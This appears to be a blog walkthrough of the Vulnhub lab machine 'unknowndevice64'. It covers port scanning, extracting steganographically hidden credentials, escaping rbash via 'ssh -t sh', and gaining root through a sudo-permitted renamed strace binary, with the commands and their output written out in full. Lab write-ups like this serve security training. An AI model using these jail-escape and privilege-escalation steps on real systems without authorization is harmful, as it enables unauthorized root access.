Vulnhub: unknowndevice64

Today we are solving "unknowndevice64" from Vulnhub - the most recent machine as of this writing.


Name: unknowndevice64: 1
Operating System: Linux
Url: https://www.vulnhub.com/entry/unknowndevice64-1,293/
Release: 9 Mar 2019
Difficulty: Intermediate(??)
Description: unknowndevice64 v1.0 is a medium level boot2root challenge. Follow your intuitions ... and enumerate!


As always, let's start with NMAP.

nmap -sC -sV -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-13 21:17 CET
Nmap scan report for
Host is up (0.000066s latency).
Not shown: 65533 closed ports
1337/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:af:04:6d:f1:8c:59:3a:d6:e1:96:b7:f7:fc:57:83 (RSA)
|   256 12:68:4c:6b:96:1e:51:59:32:8a:3d:41:0d:55:6b:d2 (ECDSA)
|_  256 da:3e:28:52:30:72:7a:dd:c3:fb:89:7e:54:f4:bb:fb (ED25519)
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-title:    Website By Unknowndevice64   
MAC Address: 00:0C:29:12:74:FE (VMware)

Let's start with the web server.
Visiting the web server gives us the following page:

Nothing really interesting being displayed here.
Looking at the source code however, reveals something interesting.

Downloading key_is_h1dd3n.jpg gives us the following image:

Exiftool gives us nothing interesting:

Same with binwalk:

binwalk key_is_h1dd3n.jpg 

0             0x0             JPEG image data, JFIF standard 1.01

But running steghide against the image prompts us for a password!

steghide extract -sf key_is_h1dd3n.jpg 
Enter passphrase: 
steghide: could not extract any data with that passphrase!

Guessing the password is really simple. Especially since the password is in the filename: h1dd3n.

steghide extract -sf key_is_h1dd3n.jpg 
Enter passphrase: 
wrote extracted data to "h1dd3n.txt".

Printing the contents of h1dd3n.txt:


This is the programming language Brainfuck.

We can use the online compiler copy.sh/brainfuck to actually run this program:

Awesome! That looks like a username/password combination.
Let's try and SSH into the box.

Initial Foothold

root@kali:~# ssh ud64@ -p 1337
ud64@'s password: 
Last login: Wed Mar 13 21:39:33 2019 from
ud64@unknowndevice64_v1:~$ ls -la
-rbash: /bin/ls: restricted: cannot specify `/' in command names

Okay, so we're stuck in rbash. Great.
Before moving on to the privesc part, we need to break out of jail.

What if we use the -t parameter with the ssh command? To maybe, spawn us a shell before we are jailed by rbash?

From the man pages:

-t Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very use‐
ful, e.g. when implementing menu services. Multiple -t options force tty allocation, even if ssh has no local tty.

root@kali:~# ssh ud64@ -p 1337 -t sh
ud64@'s password: 
sh-4.4$ ls -la
total 64
drwxr-xr-x 12 ud64 ud64 4096 Dec 31 08:51 .
drwxr-xr-x  6 root root 4096 Dec 31 06:52 ..
-rw-------  1 ud64 ud64 1028 Mar 13 21:42 .bash_history
-rw-------  1 ud64 ud64  108 Dec 31 07:09 .bash_profile
drwx------  2 ud64 ud64 4096 Dec 31 07:22 .config
-rw-r--r--  1 ud64 ud64 3729 Oct 23  2017 .screenrc
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Desktop
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Documents
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Downloads
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Music
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Pictures
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Public
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Videos
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 08:40 prog
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 08:56 web
sh-4.4$ echo #FUCK YOU, rbash

Privilege Escalation

Always, I mean always go for the low hanging fruit first.
By that I mean, always check the simplest things before starting some deep enumeration process.

sh-4.4$ sudo -l
User ud64 may run the following commands on unknowndevice64_v1:
    (ALL) NOPASSWD: /usr/bin/sysud64

Okay, so we can run a program called sysud64... Let's first run the program and see what we can do with it.

sh-4.4$ sudo /usr/bin/sysud64
/usr/bin/sysud64: must have PROG [ARGS] or -p PID
Try '/usr/bin/sysud64 -h' for more information.

Ehm, I have seen that output before.
Is sysud64 the same program as strace? If so we can easily get a root shell!

sh-4.4$ md5sum /usr/bin/sysud64
d8d774ed8ee9907338ca152454a3e435  /usr/bin/sysud64
sh-4.4$ md5sum /usr/bin/strace
d8d774ed8ee9907338ca152454a3e435  /usr/bin/strace

Well then, let's get a root shell, shall we?

By using the following command we can drop to a shell using the regular strace:

sudo strace -o /dev/null /bin/sh

And since strace == sysud64 we can now get a root shell:

sh-4.4$ sudo /usr/bin/sysud64 -o /dev/null /bin/sh
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-4.4# cat /root/flag.txt
Further Reading



